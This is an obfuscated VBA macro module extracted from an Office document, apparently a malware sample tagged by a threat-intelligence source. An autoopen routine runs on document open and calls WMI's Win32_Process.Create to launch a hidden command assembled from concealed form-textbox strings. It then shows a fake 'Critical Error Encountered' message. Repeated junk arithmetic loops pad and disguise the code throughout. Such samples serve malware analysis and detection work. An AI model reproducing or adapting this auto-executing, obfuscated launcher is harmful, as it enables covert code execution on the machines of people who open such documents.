Attribute VB_Name = "Ajoexpwnux"
Function Yjsedndskyl()
On Error Resume Next
   Set Zldvpfaaqtaou = Peclgkbxpja
   For Xuebcgoiugixn = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
Yjsedndskyl = CreateObject((Lhtytmdbb)).Create#(Ocdvzjktejpz(Eueoggexuc, Wyijbsyqmcp, Dfdtymgub), Ztxejtnkprnr, Xbdrhuwmae, Zppqacedj)
   Set Zlodbtifcbze = Slaiirau
   For Xnoxgdkvlht = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
Dgtjshaxfllbn = MsgBox(("Critical Error Encountered"), ("16"), Jvelluzxqiny.Knrdfizei)
   Set Eaasjptpbnlw = Qzvcyipfemtn
   For Nxdfkvpowys = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
End Function
Sub autoopen()
On Error Resume Next
   Set Ueokuynnpo = Mopnnpynmfc
   For Rxrraxsuapw = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
   Set Ktepuiyyndnt = Crxmuwebmzp
   For Vvnbwzlpnfvvj = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
   Set Yshkgvnukie = Fjfqpfqt
   For Gwuiobfk = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
Yjsedndskyl
End Sub
Function Xbdrhuwmae()
On Error Resume Next
   Set Npcrmlvy = Jgwzuguexb
   For Xcqowrlqf = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
Enkoljvmg = Lhtytmdbb
   Set Owxhalyphmqlx = Quopwiyzz
   For Oyursjfjab = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
Anezzqnsdydx = Enkoljvmg + ("STARTU")
   Set Ypdzreavjkq = Pbgmwaeogjb
   For Fylopezjyzcvi = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
Vkrvldts = Anezzqnsdydx + Pfevbhczwjs.Lqoldqkvs
   Set Marswkif = Itbzipfotpfun
   For Zskmwlchlsp = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
Set Xbdrhuwmae = CreateObject((Vkrvldts))
   Set Vsszafpmp = Yixlwsxxby
   For Hmahugraigxg = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
Xbdrhuwmae.XSize = False
   Set Wsqllztthq = Rjwosxzbhk
   For Mzmgerbqo = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
Xbdrhuwmae.YSize = False
   Set Oheowuoon = Irucszonyo
   For Ztcvzqvxjiji = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
End Function
Function Lhtytmdbb()
On Error Resume Next
   Set Mbdtjaswa = Cawlpxmcsc
   For Bhzhlgvqmvo = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
Lhtytmdbb = "winmgmts:Win32_Process"
   Set Odxafgbhv = Egieoxwnyej
   For Efcpgomgi = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
End Function
Function Ocdvzjktejpz(Rvyqihippdyxd, Aewqswul, Ivugsoflnq)
On Error Resume Next
   Set Gqzrxfobppf = Jrylnsmrxvx
   For Tkqxoxwye = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
Oyrjixywdeu = Pfevbhczwjs.Lqoldqkvs
   Set Qtnlokejywu = Bipubdost
   For Ozcchyvpsxym = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
Zjdxsxgbpvl = Oyrjixywdeu + Jvelluzxqiny.Vjyygevjfiis + Jvelluzxqiny.Ehbsriqbd + Jvelluzxqiny.Rjoaqygrxppi
   Set Gkmavqdy = Hxwefosmy
   For Hucwenqpzdy = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
Eqvgzienlayej = Zjdxsxgbpvl + Jvelluzxqiny.Smxktbtdpeow
   Set Gqzaptlitavn = Lnfqalstpt
   For Xqmskirbgiwre = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
Ocdvzjktejpz = Rvyqihippdyxd + Eqvgzienlayej + Rvyqihippdyxd
   Set Kxjedlcommv = Auuansneie
   For Rinnhjpwqbi = 0 To 1
         DeeH = FqkzgN - Round(905 - Round(WGGGd3J * ZiErRa7y0 - 517 / 54) - 80 / Hex(6 + CBool(Lgwx1O9Ns * CDate(FUd) * cYVtzM - Log(408)) + 459797970 - Log(78))) + RrG / Log(TACtL8k3) + sJtmHQu + Cos(Vsry * 691) * (410446765 + CStr(JMU * 904 / iUmWl126 / Round(90)) / (1 * NIz))
      If XMwQS1i > 8 Then
         KmXu8 = Cos(5743)
      End If
      kXCG9W = 192906342 / OmVx377
      FqjW624xB = 664 / 2906 * qNe / ChrW(VBwa + Tan(253 + Rnd(PnQP35A8W + Log(64) / VGTIR * Sqr(322)) * 3 + 42)) - 10132996 * CByte(452474865 + Oct(Qkl + Round(FGO) - 137451628 - CByte(2623))) * 1760 * ChrW(Rehq09Q)
         UEta = (Xuvdx99 * CBool(aNPy626sB)) * 579 / Hex(40452563) + 933 / CDate(51)
Next
End Function
Attribute VB_Name = "Jvelluzxqiny"
Attribute VB_Base = "0{95690C89-A02A-4BEC-8D3E-9D82EF1ECE56}{B2F53482-4320-454D-9E57-802AEBE971E6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Mzxqdblnwju"
Attribute VB_Name = "Pfevbhczwjs"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Lhgxccaiso, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Bfsryvdi, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Uqwugkseva, 2, 2, MSForms, TextBox"
Attribute VB_Control = "Riamjyeehzyll, 3, 3, MSForms, TextBox"
Attribute VB_Control = "Lqoldqkvs, 4, 4, MSForms, TextBox"
Attribute VB_Control = "Ojdgtaawg, 5, 5, MSForms, TextBox"
Attribute VB_Control = "Uhfntstncpt, 6, 6, MSForms, TextBox"
Attribute VB_Control = "Lavzuftsbwxn, 7, 7, MSForms, TextBox"
Attribute VB_Control = "Dvolvnen, 8, 8, MSForms, TextBox"
Attribute VB_Control = "Xfqakkkvtdgdo, 9, 9, MSForms, TextBox"
Attribute VB_Control = "Iqlcumuagoyd, 10, 10, MSForms, TextBox"
Attribute VB_Control = "Soygeolzyu, 11, 11, MSForms, TextBox"
Attribute VB_Name = "Prtxvsfywr"


INQUEST-PP=macro
